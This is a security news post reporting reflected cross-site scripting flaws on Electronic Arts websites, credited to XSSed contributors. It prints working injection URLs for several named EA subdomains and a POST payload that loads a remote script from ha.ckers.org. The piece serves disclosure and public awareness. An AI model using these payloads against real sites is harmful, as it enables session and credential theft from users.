Multiple Cross-Site Scripting Vulnerabilities on EA Websites
Multiple cross-site scripting (XSS) vulnerabilities threaten Electronic Arts (EA) gamers due to a flaw on EA main website and numerous sub domains which inlcude profile and customer support areas. Malicious users might initiate series of phishing attacks, spam fake links and use these flaws to steal sensitive personal data such as authentication and payment credentials, game account passwords and also infect PCs with malware.
Although EA’s is a TRUSTe (truste.org) certified customer, there are old unfixed flaws that were reported long ago. TRUSTe is an independent website privacy monitor and it’s seal supposed to assure EA users of safety and security of their personal data.
Vulnerable EA websites include:
ea.com: http://www.ea.com/official/godfather/godfather/us
/scripts/sound_js.inc?page=”><script>alert(‘XSS’)</script>ea.com #2: http://www.ea.com/prostreet/home.jsp?locale=
us%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ecustomersupport.ea.com: http://customersupport.ea.com/loginapp/login.do?
curl=”><script>alert(/xss/)</script>profile.ea.com: https://profile.ea.com/login.do?
surl=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E%3Cpfindgames.ea.com: http://findgames.ea.com/?
search=%22%3E%3Ciframe%20src=http://xssed.com%3Ethesims2.ea.com: http://thesims2.ea.com/exchange/
object_detail.php?hideFramework=%22%3E%3Cscript
%3Ealert(%22The%20Milk%20Man%22)%3C/script%3E
%3CMARQUEE%3E%3Cimg%20src=http://somesite.com/
somepic.jpg%3E%3C/marquee%3Eprofile.ea.com: POST action=
linkcontinue&[email protected]&password=XSS&
cpassword=XSS&month=02&day=03&year=1990&country=BD&
language=0&globaloptin=&thirdpartyoptin=&HIDE_GUS=&
account=0&migrateusername=%5BLjava.lang. String%3B%
40676af&migratepassword=%5BLjava.lang.String
%3B%405a0e76&account=xbox&migrateusername=
%22% 2F%3E&migratepassword=&account=xbox&
migrateusername=%3C%2Fli%3E%3Ciframe+
src%3Dhttp%3A%2F%2Fgoogle.c om%3E%3C%2Fiframe%3E%3C
script+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js
%3F%2F%3E&migratepassword=&acc ount=
0&migrateusername=&migratepassword=&account=0&
migrateusername=&migratepassword=
Based on reports from XSSed. Credit for the discovery and report of these vulnerabilities to XSSed: Shocker<-at->ShockingSoft.com, C1c4Tr1Z, mox, koolkeith12345, The Milk Man, x2Fusion, Arham Muhammad and Harry Sintonen.
Clarification (June 10): TRUSTe ensures certified privacy rather than protection against hacking or XSS. Consumers are able to rely on the TRUSTe certification and TRUSTe dispute resolution for any privacy issues they are having on websites that bear the TRUSTe seal. Security vulnerabilities fall outside the scope of what TRUSTe monitors.
More on CyberInsecure:
Leave a Reply
Comments with unsolicited links to other resources will be marked as spam. DO NOT leave links in comments. Please leave your real email, it wont be published.